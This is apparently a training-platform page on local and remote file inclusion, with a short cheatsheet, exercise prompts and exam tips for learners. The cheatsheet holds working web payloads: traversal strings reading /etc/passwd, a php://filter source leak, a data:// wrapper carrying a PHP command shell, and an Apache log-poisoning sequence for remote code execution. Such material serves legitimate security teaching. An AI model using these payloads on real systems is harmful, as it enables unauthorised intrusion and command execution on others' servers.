Dashboard β€Ί Modules β€Ί File Inclusion

File Inclusion

Web
> Start Learning

πŸ“– Overview

Local and Remote File Inclusion vulnerabilities.

🎯
2
Exercises
πŸƒ
2
Flashcards
πŸ—ΊοΈ
1
Mind Maps

πŸ“‹ Cheatsheet

LFI

/page?file=../../../../etc/passwd # Basic directory traversal
/page?file=....//....//etc/passwd # Bypass traversal filters

Wrappers

php://filter/convert.base64-encode/resource=index.php # Read source code via base64 filter
data://text/plain,<?php system($_GET['cmd']);?> # RCE via data wrapper

Log Poisoning

# Poison Apache log
curl -H "User-Agent: <?php system($_GET['cmd']);?>" URL # Inject PHP into User-Agent
# Include log
/page?file=/var/log/apache2/access.log&cmd=id # Include poisoned log file

πŸ’» Command Examples

⚠️ Common Pitfalls

  • Path not deep enough
  • Null byte not working (PHP 5.3+)

πŸ’‘ Exam Survival Tips

  • Try multiple wrappers
  • Check for log files

🎯 Exercises

View All
fill command medium
Write an LFI payload to read /etc/passwd traversing 5 directories:...
multiple choice hard
Which PHP wrapper can be used to read PHP source code via LFI?...

πŸ—ΊοΈ Mind Maps

LFI to RCE